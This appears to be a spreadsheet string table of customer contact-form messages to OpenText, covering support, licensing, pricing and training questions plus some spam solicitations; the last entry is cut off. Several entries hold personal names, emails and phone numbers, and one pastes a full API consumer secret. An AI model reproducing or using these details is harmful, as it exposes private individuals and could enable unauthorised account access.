    <t>I am in Legal and Compliance and we have a current implementation of eDocs DM 5.3.1.  We were recently told that our company is going to move from Microsoft Office and migrate to GSuite.  Outlook will be the first application to be replaced by Gmail in the second quarter.  Do we have any options on how to continue to use eDocs?  I can't find my sales person contact information so just asking for someone to reach out to me to discuss options.  Also interested in moving to the cloud.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Please confirm the licensing model for OpenText Office Editor 10.5.2._x000D_
_x000D_
Thank you,_x000D_
Claude </t>
  </si>
  <si>
    <t xml:space="preserve">Kindly allow me to introduce myself. My name is Abdullah Bin Hazzaa – Vendors Management in Public Investment Fund (Saudi Arabia)_x000D_
_x000D_
We have projects related to your expertise, therefore, we would like to qualify and register your company to become one of the Public Investment Fund’s Official Vendors.  _x000D_
</t>
  </si>
  <si>
    <t>PM</t>
  </si>
  <si>
    <t>looking for OT training - advanced admin and workflows.</t>
  </si>
  <si>
    <t>I'm unable to access the OpenText knowledge base. I'm trying to download a version of EnCase Forensic and am receiving the message:  _x000D_
_x000D_
"No Access.  _x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
_x000D_
Please advise, thank you  -Chris</t>
  </si>
  <si>
    <t>we have a OpenText sales evaluation Packing Slip, and would like to download a Brava! for Recation tools to test._x000D_
_x000D_
the link I have, don't provide me the download link,_x000D_
_x000D_
thanks_x000D_
Stella</t>
  </si>
  <si>
    <t xml:space="preserve">open text right fax express has stopped sending faxes  the faxes are routing to a email box but not to the Konica Minoltas need help ASAP   </t>
  </si>
  <si>
    <t>I see that Exceed 15 is supported in the windows 10 fall creator update. we are currently testing Exceed 14 on Windows 10 v1803. just need to confirm that opentext exceed will be supported on Win10 v1803</t>
  </si>
  <si>
    <t>CZ</t>
  </si>
  <si>
    <t xml:space="preserve">Dobrý den,_x000D_
naše firma má nejzákladnější verzi EDI která není online. Rádi by jsme se dozvěděli více o plné verzi. Hlavně  jak přispívá z hlediska daňového  a co by to přineslo kolegům z logistického oddělení._x000D_
děkuji </t>
  </si>
  <si>
    <t>UZ</t>
  </si>
  <si>
    <t>we cannot update SPPS in cavisit system</t>
  </si>
  <si>
    <t>Interesse an OCR Scan Produkte nach S/4HANA</t>
  </si>
  <si>
    <t xml:space="preserve">Does EXCEED on Demand version 13.8 support TLSv1.2 or SSL? What versions of SSL and TLS does this version support and can the Administrator set the one to use? </t>
  </si>
  <si>
    <t>Can you provide us with the Demo on the documentation management system, which has the authorization function? As we are looking for a new platform to document all kinds of contract/IP/software/project articles/conference speak, etc. Thanks!</t>
  </si>
  <si>
    <t>HR</t>
  </si>
  <si>
    <t>How is Gupta Team Developer licensed? Perpetual license with an optional yearly maintenance?</t>
  </si>
  <si>
    <t>Hello, _x000D_
I have just paid invoice RC384644, could you send me an invoice which says I've paid please?</t>
  </si>
  <si>
    <t>Hello, _x000D_
Could you please send me the invoice for RC384644? I have just paid it, however no invoice was sent to me?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Do you want more clients and customers?_x000D_
_x000D_
We will help you by placing your website on the 1st page on Google._x000D_
_x000D_
I will be happy to send the "Free Proposal" and "Pricing"._x000D_
_x000D_
Want to know more about my company, costing on SEO, results etc._x000D_
_x000D_
Please email us for full proposal._x000D_
_x000D_
Thank You!_x000D_
Maria | Whatsapp: +91 9212464161</t>
  </si>
  <si>
    <t>WS</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Hello! Behold is  an important offering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March 31.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FeedbackForm2019@gmail.com _x000D_
 _x000D_
Hope to hear from you soon. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm looking for certifications from a sales perspective. We are working with Content Suite, Exstream platform, OTMM (DAM) and OT Capture. Pleas advice me how to create a personalized  certification plan ._x000D_
Best regards_x000D_
//David</t>
  </si>
  <si>
    <t xml:space="preserve">Hi opentext,_x000D_
_x000D_
I’m working on your Execute360 product for Sampension in Denmark._x000D_
_x000D_
And I have come across a rather troublesome error._x000D_
When I try to insert more than 400 documents into a single case in Execute360._x000D_
“CAL.Exceptions.TooManyChildrenException: Maximum number of children (400) in the folder was exceeded”_x000D_
_x000D_
I would like to know if this limit is something that is possible to change or if it is a predefined limit inside Execute360._x000D_
_x000D_
_x000D_
Best regards,_x000D_
Kevin Sjøbeck_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Wincanton account number with OT is: GB0119400153_x000D_
_x000D_
Wincanton have been asked by a current client to provide EDIFACT DESADV ASNs to Asda for deliveries to their Distribution Centres from our warehouses.  _x000D_
Question 1) Does OpenText provide a broker service for this action? Wincanton have been rebuffed by Asda when we made contact with them as they would only interact with their suppliers?  _x000D_
Question 2) If so, then can you provide some information as to the process and an estimate of the potential costs that this service could attract?  Unfortunately we do not currently have any details of the potential volumes of Asda orders that would need to be sent across so a range of costs would be appreciated including estimated set up costs and ongoing traffic and support/annual maintenance costs._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>THIS IS A TEST</t>
  </si>
  <si>
    <t>Hi support,_x000D_
_x000D_
We get the following error when using your product Execute360, when we insert more than 400 documents onto a specific case:_x000D_
CAL.Exceptions.TooManyChildrenException: Maximum number of children (400) in the folder was exceeded..._x000D_
_x000D_
Do you know if it is possible to change the value of maximum number of children to more than 400 for a case, and if it is where do we change it ?_x000D_
_x000D_
Sincerely,_x000D_
Kevin</t>
  </si>
  <si>
    <t>Need Access to 16.3 Documentation</t>
  </si>
  <si>
    <t>We have recieved an invoice from you, but we are unsure what we are paying for._x000D_
Can you please tell me what "Intelligent web forms" is?_x000D_
Can you see is this is something we use?_x000D_
_x000D_
Account number: DK02-500100_x000D_
Invoice umber: NL100009951</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je souhaiterais avoir des informations concernant le coût de la licence Proxy SOCKS client en version supporté sur windows 10 et par nombre d'utilisateurs supportées._x000D_
Merci à vous._x000D_
Cordialement,</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
It is possible to integrate LiquidOffice with other your products, for example OpenText Core or Documentom?</t>
  </si>
  <si>
    <t>About the influence of software on changing Japanese era and too long Holiday in Japan._x000D_
_x000D_
I am a member of a Strategic Outsourcing project with IBM and the end user SMBC Mobit._x000D_
_x000D_
Please confirm the impact of the software on changing the Japanese era of Expedite  of your product._x000D_
_x000D_
◆ Your product information and SMBC Mobit environment (as of 2019/3/27)_x000D_
_x000D_
[Your company product information]_x000D_
S / W: Expedite_x000D_
_x000D_
[SMBC Mobit Environment]_x000D_
OS: z / OS v2.3 (IBM)_x000D_
_x000D_
◆There are 3 items for us to confirm in regards to that._x000D_
_x000D_
1.The effect of adding a new holiday (holiday)_x000D_
・ A product that is aware of holidays on calendars?_x000D_
・ Do you have a calendar in the product?_x000D_
_x000D_
2. The impact of changing the Japanese new era from a Japanese era name HEISEI._x000D_
・ Is the product conscious of the era?_x000D_
・ Do you hold the era in the product?_x000D_
_x000D_
3. If you have any other information related to the change of the Japanese era, please contact me by e-mail_x000D_
_x000D_
Deadline for answer: 2019/4/5</t>
  </si>
  <si>
    <t>CH</t>
  </si>
  <si>
    <t>Hello, I am new to the VILT-Group, an OpenText gold partner, and I just opened my new account on KC. Could you give me access rights to everything a Reselling/Services/Support partner needs access?_x000D_
Thank you and best regards_x000D_
Caspar</t>
  </si>
  <si>
    <t>Hi, I need assist to access learning central. Thank you.</t>
  </si>
  <si>
    <t>I'm looking to understand better how OpenText ECM works with Native Engineering tools from Autodesk, Bentley, Solidworks, Tekla etc. _x000D_
Also interested in support for 3D central models, which get collaborated on e.g. in BIM360._x000D_
_x000D_
I would actually like to discuss setting a demo/Q&amp;A session.</t>
  </si>
  <si>
    <t>KZ</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
 _x000D_
Company RG Processing from Kazakhstan looking for suitable Document Management system for our gold production project. We kindly would like to request more detailed presentation video, regarding Documentum per below requirements:_x000D_
-	Creating Project/Vendor Document numbering;_x000D_
-	Registration (doc type, number, status, revision, discipline, etc.);_x000D_
-	Transmittal issue;_x000D_
-	Distribution;_x000D_
-	Security/confidentiality;_x000D_
-	Review process (revisions);_x000D_
-	Support for creating for Monthly reports_x000D_
 -	Compatibility with Project cloud, EDMS have to work base on it._x000D_
 _x000D_
Also, could you please send us an approximate price for installation and service. _x000D_
 _x000D_
Thank you. _x000D_
 _x000D_
Looking forward to your reply. _x000D_
</t>
  </si>
  <si>
    <t>AQ</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Ciao! That is an important offers for you. I can help you with sending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March 31.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FeedbackForm2019@gmail.com _x000D_
 _x000D_
All the best _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a vulnerability detected on this file:_x000D_
_x000D_
Description_x000D_
Nessus found the following service with an untrusted path : _x000D_
LicMan : C:\Program Files (x86)\Common Files\Captaris\DOKuStar License Manager\bin\LicMan.exe_x000D_
_x000D_
The remote Windows host has at least one service installed that uses an unquoted service path, which contains at least one whitespace. A local attacker can gain elevated privileges by inserting an executable file in the path of the affected service._x000D_
_x000D_
See Also: _x000D_
_x000D_
*** CVE-2013-1609,CVE-2014-0759,CVE-2014-5455 ***_x000D_
_x000D_
Solution_x000D_
Remove lines from script area_x000D_
Add lines to script area_x000D_
Ensure that any services that contain a space in the path enclose the path in quotes._x000D_
</t>
  </si>
  <si>
    <t>I cannot access to support portal using my acocunt, frankie.chan@wynnpalace.com._x000D_
I tried to reset password and said fail to update the password.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you help me to have grant to knowledge base page, please?_x000D_
Also I'd like to know how to delegate user via administration? Thank you team! </t>
  </si>
  <si>
    <t>MQ</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good day! Here is  an amazing offer for you. I can send your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. Mailing is made in the same way you received this message. _x000D_
Sending via Feedback Forms to any domain zones of the world. (more than 1000 domain zones.). _x000D_
The cost of sending 1 million messages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March 31.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FeedbackForm2019@gmail.com _x000D_
 _x000D_
Thank you for your attention. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>Looking for an AI powered text analytics solution for market research agency.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a contact person to help with an official quote for software cost to migrate 6 existing  EOD Server user to 6 ETX users._x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">We are using opentext SQL Server 2014 as a backend.  We would like to do "Page compression for tables" in Opentext databases.  Please let us know if you have any concerns / recommendations. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am reaching out you guys to get more information about OCR (optical character Recognition)  software, my company looking for some help for AP invoice automation to minimize the user intervention while creation invoices._x000D_
Please call me or email me for our initial discussion. _x000D_
_x000D_
Jamal Farooq_x000D_
Desk : 2899822939_x000D_
Cell : 416-854-4461</t>
  </si>
  <si>
    <t>We have a customer that has the eDOCS DM product and is having an issue with it.  While attempting to simply get to the WiKi/Forums/whatever, I registered and authenticated, but got stuck in a loop where as soon as I log in, I can't get any further stating that I need to confirm the email, which I've done twice now.  The email I used to register is whizkids@lindjensen.com</t>
  </si>
  <si>
    <t xml:space="preserve">Please add my email to use self service portal / to raise Technical support. </t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to discuss automated document processing and filing options. </t>
  </si>
  <si>
    <t>Looking for pricing and some very high level technical info on the OpenText Decisiv search engine.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
Mein Name ist Moritz Löchner und ich studiere zurzeit an der WHU in Vallendar. Ich schreibe meine Bachelor Arbeit über das Thema: "Blockchain Benchmarks in der Supply Chain" und bin im Rahmen meiner Recherche auf ihr Unternehmen gestoßen. Ich würde sehr gerne ein Interview mit Chainstep machen, um mehr über den Status Quo der Blockchain Technologie in der Supply Chain zu Erfahren. _x000D_
_x000D_
Mit freundlichen Grüßen, _x000D_
Moritz Löchner </t>
  </si>
  <si>
    <t>We're looking for a platform to migrate away from our iManage environment where we've outgrown its functionalities and features. Thanks.</t>
  </si>
  <si>
    <t>Conduent has sold line of business to Avenu Holdings. Need to move/assign our contract with you over to Avenu so they can keep using your products. Please have someone call/email as soon as possible.</t>
  </si>
  <si>
    <t>Hi, I like to understand how Teamsite integrates with Asp .Net Core 2 applications</t>
  </si>
  <si>
    <t>Is your cloud offering FedRamp/NIST compliant?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
in the context of a European EDI project we would like to carry out a tender. Please send me the appropriate contact details of your company._x000D_
Yours sincerely_x000D_
</t>
  </si>
  <si>
    <t>BA</t>
  </si>
  <si>
    <t>LOOKING FOR JOB IN BUSINESS ANALYST PROFILE</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
_x000D_
I am a certified Content Server System Administrator and AIIM Information Specialist with  strong sales backround who is the market for an available post anywhere in South Africa or Dubai._x000D_
_x000D_
May you please supply me with relavant contact details of where I can forward my resume._x000D_
</t>
  </si>
  <si>
    <t>I am unable to get to the knowledge base in my user account.  It says to verify email, which i have done.  Thanks!</t>
  </si>
  <si>
    <t>I am trying to add a trading partner to our profile. It is an interconnect with SPS. It asks_x000D_
me to enter the trading partner information and then fails and says contact support._x000D_
ISA ID is 78132667YK qualifer is ZZ. Thank you.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
unser schulischer Bibliotheksserver hat nach 10 Jahren seinen Dienst aufgegeben. Jetzt müssen wir die Bibliothekssoftware auf die Version Bibliothecaplus 8.0 upgraden. Im Gegensatz zu früher liefert OCLC den notwendigen SQL-Server leider nicht mehr mit. Daher benötigen wir einen SQL-Server, der in den Spezifikationen genannt wird. Dort ist der Unify SQL Base 11.5 Server genannt. Bei unseren alten Versionen war noch ein Gupta SQL Server dabei. Da Sie die Nachfolge der oben genannten Produkte herausbringen, hätte ich gerne ein Angebot für einen passenden Base SQL Server. Der SQL Server wird auf einem Microsoft 2012 R2 Server laufen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Alexander Keller</t>
  </si>
  <si>
    <t>Looking to get information on the integration of EC and Nuance's Power PDF software, and I am unable to get through to support.</t>
  </si>
  <si>
    <t xml:space="preserve">To have a link to company page.thanks </t>
  </si>
  <si>
    <t>Would like to have access to support</t>
  </si>
  <si>
    <t>We implement the Tririga product for clients and the product works with Brava! for displaying certain types of documents. One option for implementation is SaaS, but it wouldn't be able to accommodate the Brava! server. Is it possible to host the Brava! server in a different cloud environment than the servers that host and serve the documents? Is it feasible and, if so, will it perform well? We're in the middle of an assessment for a client and this may be a route for future clients as well._x000D_
_x000D_
Thanks,_x000D_
Joe</t>
  </si>
  <si>
    <t xml:space="preserve">My company does third-party vendor risk management on behalf of your EasyLink customer, Miles &amp; Stockbridge Law Firm. I would like to know whom I may contact regarding security assessment and compliance certification requests, as the contact M&amp;S provided (Luis Chavez / lchavez@opentext.com) has not been responsive and the firm needs an up to date security assessment and any certifications as part of their audit requirements. I can be reached via phone or email, or you can contact Maria Fleischmann of Miles &amp; Stockbridge directly at mfleischmann@milesstockbridge.com or 410-385-3844. Any guidance is much appreciated! </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm looking for some information regarding the Brava Viewer 6.2. Is there still support provided for that version of the viewer? If not, was there an end of support date? Is the Brava Viewer 6.2 only supported up to a certain operating system? If so, what is the supported operating system? Any information you can provide there would be great!_x000D_
_x000D_
Thank you!_x000D_
Mason Halligan</t>
  </si>
  <si>
    <t>Interested in learning about document imaging and storage.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
At my company, we are developing two training documents that we will be sending to trainees that we need to secure with DRM (require login to open document, prevent printing, track document opens, remote access denial, etc.) We would need very few administrative accounts, but ideally unlimited users (I.e., the trainees we send the document to)._x000D_
_x000D_
Can you let me know if your service would meet our needs, and what monthly pricing is? Most of the larger players we have reviewed are just too expensive. _x000D_
_x000D_
Thanks,_x000D_
Brendan_x000D_
</t>
  </si>
  <si>
    <t>Is Rightfax version 10.6 windows 10 compatible?</t>
  </si>
  <si>
    <t>I am attempting to install newly purchased Exceed software. After installation, the system prompts that I am on an expired trial version.</t>
  </si>
  <si>
    <t>MB</t>
  </si>
  <si>
    <t>Our TeleForm user keeps his computer on all the time so he can receive emails of forms - this then gets migrated to Teleform. He had his computer crash and had to restart on Monday. He lost all his received scans from the weekend. Is there a best practice for us to prevent this from happening? Is there anything you can recommend we do?</t>
  </si>
  <si>
    <t>Taha</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
i finished The DF120 - Foundations in Digital Forensics but i realized that_x000D_
the arabic litters of items included in the final report appears as blocks _x000D_
how can i fix this i need to know the settings so that to make the arabic litters appear _x000D_
instead of blocks_x000D_
thanks  </t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using Decisiv Search within our business which we are now no longer supported for. We have an issue with some of the Synchronisation of data and we are looking to get some support. Please can you advise on next steps to gaining a support contract. </t>
  </si>
  <si>
    <t>I am a managed IT services company for a San Antonio based law firm with 40 attorneys and staff._x000D_
_x000D_
They are currently using OpenText Document Management.  We are doing a hardware refresh and want to understand  the latest versions of an on-premesis document management solution.  _x000D_
_x000D_
If I could do a short call in advance to ensure we have a common understanding of the scope, I am available most of the week.</t>
  </si>
  <si>
    <t>Need EDI integration with SAP ECC</t>
  </si>
  <si>
    <t>Can Brava Desktop open .c4 file extensions?</t>
  </si>
  <si>
    <t>We do use OpenText VIM but we have bought the licenses via SAP Norway as our headquarter was in Norway during implementation of VIM by OpenText. How do I register on your support site to access software updates and other potential needed information._x000D_
Thanks and regards_x000D_
Frank Schröder_x000D_
Manager Process &amp; Projects</t>
  </si>
  <si>
    <t>Open text socks client 14x64 is not working and giving the below error:_x000D_
' The feature you're trying to use is on a network resource that is unavailable._x000D_
Click OK to try again or enter an alternate path to a folder containing the installation package ' Open Text SOCKS client 14x64.msi' in the below box.'_x000D_
Please assist.</t>
  </si>
  <si>
    <t>We are trying to test with the CIG group at Ariba for one of our customers and get EDI sent from Ariba to our test mailbox. Unfortunately, I’m, not getting any response on a ticket I entered last week on the opentext website. The ticket number is 1-3585960269 and it’s to set up an AS2 connection to the Ariba CIG partner. I need an answer ASAP!!</t>
  </si>
  <si>
    <t>I called sales a few times but no answer. Looking for a cloud EDI solution for our JD Edwards. Automotive industry.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! Our company is EDI provider in Russia. We need ENX connection with Renault to connect Russian suppliers. Please contact with me by email if you have any suggestions._x000D_
Thank you ahead. </t>
  </si>
  <si>
    <t xml:space="preserve">I have requested access to be able to pay our invoices on line. Waiting a confirmation email from support.  </t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t xml:space="preserve">Can I pay our invoices for Melling Tool on this web site? </t>
  </si>
  <si>
    <t>We are currently installing Win10 r1803 systems with FC v16.108. These systems also have Outlook 2013 installed on them. The problem that we are noticing is that even although we are setting the defaul email App to be Outlook everything is defaulting to FirstClass. Is there any settings that we can change to stop this.</t>
  </si>
  <si>
    <t>We have Documentum product with site ID  [1003802771 | National Organization for Social Insurance_x000D_
We want to contact Opentext  support</t>
  </si>
  <si>
    <t>HI, I am looking for some information regarding EDI. _x000D_
As a company we need to be EDI compliant to join NMBS, and apparently need to be compliant to Trader Conversation level 9. _x000D_
Could you give me an indication as to what is involved in this and how we can go about becoming EDI compliant and the cost of this. _x000D_
_x000D_
Kind regards,_x000D_
Callum</t>
  </si>
  <si>
    <t>Please can you guide me related to learn opentext documentum</t>
  </si>
  <si>
    <t>Need to submit a request for the License Activation file for the following license S/N#  X100008218457  X100008470780_x000D_
X100008267004</t>
  </si>
  <si>
    <t>CL</t>
  </si>
  <si>
    <t>I need  to know more about Opentext, how much it cost to migrate edocs to sharepoint.</t>
  </si>
  <si>
    <t>Just a generic query. My company is a partner of Cognizant. Am I eligible for My Support ? Please reply by email.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
Can you please help me, how to become official Opentext partner. _x000D_
_x000D_
Please share more details._x000D_
_x000D_
Thank you_x000D_
Prakash </t>
  </si>
  <si>
    <t>We want to order license for OpenText Exceed. Last year I was in touch with Philip COX._x000D_
And we had some e-mail communication._x000D_
Whom can I now send my e-mail?</t>
  </si>
  <si>
    <t>Dear Sir / Madam_x000D_
_x000D_
we would like to have two training course in UK , one For digital fundamental forensics and other one is Incident response in July. But we nneed more info about payment Information option because since we govern sector.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am an EDI consultant working for Plastic Omnium group (I believe there is already a business relationship between Opentext and Plastic Omnium)._x000D_
_x000D_
We are interested in looking at your scalable "Freeway" solution to cover some EDI integration requirements with some of our vendors (we are tier 1 automotive) who are of differing technical capability (to be nice)._x000D_
_x000D_
Do we have a pre-existing account manager who we can communicate with please?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
_x000D_
Hope everything is going well._x000D_
I am Ibrahim and working for Deloitte Portugal as a Tech Consultant, and this email is part of an on-going project that considered OpenText as a potential vendor, here below is the context. Kindly, ensure a fast reply._x000D_
_x000D_
Our client is a multinational manufacturer based in Europe and has manufacturing units all over the world, that has been recently facing challenges regarding workflow automation and content management. They were seeking our advice to recommend a solution that can solve their challenges and fulfills some important features such as:_x000D_
-	Document Management_x000D_
-	Process Management_x000D_
-	Process Automation_x000D_
-	SAP Integration &amp; API Management_x000D_
-	Reporting and Analytics_x000D_
-	Access Control_x000D_
-	Usability_x000D_
-	Agility_x000D_
_x000D_
Here are some important parameters:_x000D_
-	500-2500 users;_x000D_
-	200 workflows (max);_x000D_
-	1000 forms (max);_x000D_
-	Cloud-based solution;_x000D_
-	SAP integration (essential)._x000D_
_x000D_
After pursuing a market high-level analysis, we -a consulting team from Deloitte- selected OpenText among other potential vendors to provide solutions/products that cover the previously mentioned features. Hereby we ask your commercial and sales engagement to provide us with answers for the following questions:_x000D_
-	Which products do you have that can cover the targeted features? (please name it)_x000D_
-	What are the technical and functional capabilities of these products?_x000D_
-	What is the licensing model? (prices’ packages with its limitations and specs)_x000D_
-	Are there any extra fees apart of the licensing cost? (setup fees, SLAs upgrading fees,… etc.)_x000D_
-	Do you have an annual/monthly billing value limitations? (if applicable)_x000D_
-	Do you have local support in Portugal and/or Spain? (If yes, who? and contacts)_x000D_
-	What is the typical implementation process to implement your products?_x000D_
-	What is the average implementation period for each product?_x000D_
-	What are the resources that you need for the implementation process?_x000D_
-	Are there any special implementation p</t>
  </si>
  <si>
    <t xml:space="preserve">We are testing Right Fax and wanted to know about the Latest Version of Right Fax?_x000D_
Whether the Latest Version of Right Fax is Compatible with TLS1.2 or Higher ?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>VT</t>
  </si>
  <si>
    <t>Hello, did you receive my offer? _x000D_
from2325214cv</t>
  </si>
  <si>
    <t>CY</t>
  </si>
  <si>
    <t>I would like to see the trial version of Report  Builder 6.3 in order to decide of buying it._x000D_
I'm design my company's Reports on our ERP sytem._x000D_
_x000D_
So I'm wandering If I can download and use a trial version of the Report Builder 6.3._x000D_
_x000D_
Regards,_x000D_
Marianna Theodorou</t>
  </si>
  <si>
    <t xml:space="preserve">I need assistance on downloading OpenText Brava! Extended ECM platform to connect with my lead application._x000D_
_x000D_
Any suggestions would be helpful!_x000D_
It would be great if we can get any demo/trial version for POC._x000D_
_x000D_
Thanks in Advance!_x000D_
  </t>
  </si>
  <si>
    <t>Hilfe bei Einrichtung von VPN zum Auftragsabruf über Trading Partners.Durch Virenbefall beim Kunden ist der VPN Zugang unbrauchbar geworden und muss erneuert werden.</t>
  </si>
  <si>
    <t>Ihre Überweisung vom 20.03.2019 über 49,00 € kann ohne weitere Angaben nicht zugeordnet werden. Bitte den genauen Verwendungszweck angeben.</t>
  </si>
  <si>
    <t xml:space="preserve">I am an incoming 5th year student under the Electronics Engineering Program (BS ECE) of the University of Santo Tomas._x000D_
_x000D_
In partial fulfillment of the Program, I am required to have at least 240 hours of comprehensive training within the confines of a reputable and well known establishment whose functions are within the scope of Electronics Engineering discipline. This training will enable me to obtain firsthand experience in my field of endeavor and provide me with knowledge of some of its aspects._x000D_
_x000D_
In connection with this, may I request your good office to kindly accommodate yours truly in your organization to undergo an On-the-Job Training (OJT) this coming Special Term AY2018-2019._x000D_
_x000D_
The undersigned will highly appreciate your hospitality in this regard. I am hoping for your most favorable reply regarding this matter._x000D_
</t>
  </si>
  <si>
    <t>Hei,lähetys Kanadasta,läh:Debco,tullataanko tämä yksityiselle vai yritykselle?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
we are looking to introduce a document management system within our organisation to regain control of the various documents in use. We are looking to use it for;_x000D_
-	Storing of various document types_x000D_
o	PDF, Word, Excel, MTL etc_x000D_
o	DWG, DXF, STEP files etc _x000D_
-	Revision control	_x000D_
-	Notification of revision updated (on selected files)_x000D_
-	Check in /out function to maintain control of live documents_x000D_
-	Work flow process for document approval_x000D_
-	Security access for sensitive documents (HR, Contracts etc)_x000D_
-	Transmittals to external clients_x000D_
-	Remote access Via tablets or smart phone _x000D_
-	PDF writing capability for “As Constructed” drawings on site eliminating the paper-based copy when in the field_x000D_
If you can offer the above, I would be grateful if you can you please send me a proposal so I can review._x000D_
Thanks_x000D_
Alastair_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Error message when sending outgoing file._x000D_
</t>
  </si>
  <si>
    <t>Inquiring about cost</t>
  </si>
  <si>
    <t xml:space="preserve">My organization uses Hightail to send financial information.  When my computer was updated, all favorites were lost, which where Hightail was.  This is my first year as Treasurer, and I do not have the password to access Hightail.  </t>
  </si>
  <si>
    <t>We are looking at options for an X windows tool. Our servers are a mixture of openVMS and linux. _x000D_
_x000D_
I would like to know if your tool has proven itself to be fully compatible with both of the above architectures and supports VTxxx emulation._x000D_
_x000D_
(P.S. I asked for a trial license before seeing the "contact us" link)</t>
  </si>
  <si>
    <t>I am interested in documentation on the OpenText RightFax COM API.   I have an idea for a software integration with RightFax and would like to pursue development.  I am an individual, not currently affiliated with a company.  What can I do to gain access to a non-production development version of Rightfax, and documentation for the COM API?</t>
  </si>
  <si>
    <t>I do register already. but I can't access my suport.</t>
  </si>
  <si>
    <t>Benefits Payload is a company in Rochester where they dont do any EDI transactions or have any EDI software installed. The client need to send 834 X12 transaction to few Trading Partners who requested. So we are looking for options if an opensource tool can take care of communication, translation and production issues based on that what would be the cost . Inorder to have this discussion I will be available between 6PM -9PM EST . Please send me  a note before calling so that I will not miss the call.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, i trying to test your app for salesforce but i think i need this info_x000D_
_x000D_
YOUR-IP address (e.g. i-080c8x833e05c.powerdocs.systems)-Tenant ID-Partner System ID_x000D_
This is my Consumer Secret: DC0D48B977B0605B62CBBBD46727C43E76E9CA6BDD588E4E1FBDFBF7B64EDA33_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking at OpenText to Exhibit at our 2019 Annual Convention in New Orleans~email for more information, we'd love to have you. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have a signed and approved PO for this conference. Will you accept a PO and invoice us?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Can you please explain how I can create a new Category in Enterprise Connect? I see other categories in a drop down, but can't seem to figure out how to create a new one. Much appreciated</t>
  </si>
  <si>
    <t>I am a Hightail account owner and have been experiencing major difficulries with sending files. I do not get a receipt sent to my eamil when I send files to my clients. Now that Hightail is opentext maybe this will fix the problem, I need someone to contact me. Thanks, Susan 707.363.0988</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
 _x000D_
I hope this email finds you well! I am reaching out on behalf of the York Region Arts Council (YRAC) with the opportunity to partner on the 2019 York Region Festival Trail. YRAC oversees the annual York Region Festival Trail, a large-scale marketing campaign spanning 40 festivals and events throughout York Region each May-December._x000D_
 _x000D_
The opportunity to sponsor this campaign is unique in that sponsors have the opportunity to reach not only each of the 40 festivals and events but also over 600,000 attendees. Importantly, partnering with YRAC on this campaign demonstrates your organization’s support for arts and culture across York Region. Any amount helps, and the proceeds are used towards increasing visibility for the festivals and events that are participating, encouraging both residents and visitors to attend local events and creating a vibrant, exciting York Region. _x000D_
 _x000D_
I would like to send you a partnership package and book a time to chat further about this opportunity in the next week if you let me know what works best for you. Please note that in order to have your corporate logo included in the print version of the Festivals &amp; Events Guide (distributed to 75,000 residents, visitors and businesses in York Region and surrounding areas), sponsorship would have to be confirmed by April 5th._x000D_
 _x000D_
Thanks for your time, I look forward to answering any questions you may have._x000D_
</t>
  </si>
  <si>
    <t>When is the next onsite EnCase training for beginners in the Wash DC area?</t>
  </si>
  <si>
    <t>Hi, I installed Exstream Design &amp; Production V16.4.5 on my laptop that runs on Windows 10 64-bit operating system. I have MS Office 2016 MSO 32-bit version installed this machine. Using Exstream DBAdmin tool,  I attempted to create an empty design database of type MS Access. I am getting an error message "Data source name not found and no default driver specified". I am assuming this is a 64-bit/32-bit compatibility issue between Exstream and MS Access. Could you please suggest if you have any workaround for this?</t>
  </si>
  <si>
    <t>I have a feature request for the Tableau TX1.  Right now, it will only verify images with a valid "tx1_packed_log" file, meaning only images that it created.  I would very much like it to be able to verify any image thrown at it, within reason.  It would keep me from tying up my workstations.  Also, it would leverage our 10 Gb line, since not all my workstations have the latest NICs.</t>
  </si>
  <si>
    <t>I'm attempting to download the report: "The legal operations tipping point_x000D_
